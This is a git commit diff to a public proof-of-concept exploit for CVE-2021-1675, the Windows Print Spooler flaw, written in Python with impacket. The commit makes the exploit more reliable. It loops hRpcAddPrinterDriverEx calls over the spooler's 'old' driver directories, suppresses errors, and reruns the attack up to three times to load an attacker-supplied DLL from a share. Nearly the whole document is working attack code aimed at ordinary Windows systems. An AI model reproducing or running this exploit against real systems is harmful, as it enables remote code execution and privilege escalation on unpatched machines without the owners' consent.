Increased PoC stability

Signed-off-by: cube0x0 <vidfelt@protonmail.com>
2024-12-22 02:36:33 +00:00 · 2021-06-29 21:51:08 +02:00 · 2021-06-29 21:51:08 +02:00 · 86152766a0
commit 86152766a0
parent b94fddca41
1 changed files with 20 additions and 23 deletions
--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@ -3,7 +3,7 @@ from impacket.dcerpc.v5 import rprn
 from impacket.dcerpc.v5 import transport
 import argparse
 import sys
-
+import time

 def connect(username, password, domain, lmhash, nthash, address, port):
    binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
@ -50,29 +50,19 @@ def main(username, password, domain, lmhash, nthash, address, port, share):

    print("[*] Uploading {0}".format(share))

-    #stage 0
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
    print("[*] Stage0: {0}".format(resp['ErrorCode']))
-
-    #stage 1
-    container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\{0}\x00".format(filename)
-    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
-    print("[*] Stage1: {0}".format(resp['ErrorCode']))
-
-    #stage 2
-    container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\2\\{0}\x00".format(filename)
-    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
-    print("[*] Stage2: {0}".format(resp['ErrorCode']))
-
-    #stage 3
-    container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\3\\{0}\x00".format(filename)
-    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
-    print("[*] Stage3: {0}".format(resp['ErrorCode']))
-    
-    if (resp['ErrorCode'] == 0):
-        print("[+] Exploit Completed")
-    else:
-        print("[-] Not Completed")
+    for i in range(1, 50):
+        try:
+            container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
+            resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
+            print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
+            if (resp['ErrorCode'] == 0):
+                print("[+] Exploit Completed")
+                sys.exit()
+        except Exception as e:
+            #print(e)
+            pass


 if __name__ == '__main__':
@ -122,5 +112,12 @@ Example;
        lmhash = ''
        nthash = ''

-
+    #re-run if stage0/stageX fails
+    print("[*] Try 1...")
+    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
+    time.sleep(10)
+    print("[*] Try 2...")
+    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
+    time.sleep(10)
+    print("[*] Try 3...")
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)